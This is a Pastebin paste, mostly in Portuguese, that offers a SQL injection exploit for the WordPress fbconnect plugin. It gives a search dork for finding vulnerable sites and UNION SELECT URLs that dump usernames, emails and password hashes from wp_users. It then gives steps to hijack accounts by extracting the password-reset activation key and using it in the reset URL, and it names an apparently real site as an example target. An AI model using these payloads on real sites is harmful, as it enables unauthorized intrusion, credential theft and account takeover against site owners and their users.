Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploit Wordpress pei pei pei
- DORK['1']:inurl:"/?fbconnect_action=myhome"
- http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]
- EXPLOIT:
- Mostrando user,email,senha(user_login,user_email,user_pass):
- http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
- Com o email do usuário em mãos, vá até o painel de administrador.
- http://VULL.COM/wp-login.php
- "click em Lost your password ?"
- É peça uma nova senha enviando para o e-mail.
- Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa
- http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12+from+wp_users--
- Vamos modificar a senha do usuario com a KEY CAPTURADA
- http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
- USANDO:
- http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA
- Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.
- EXEMPLO:
- http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement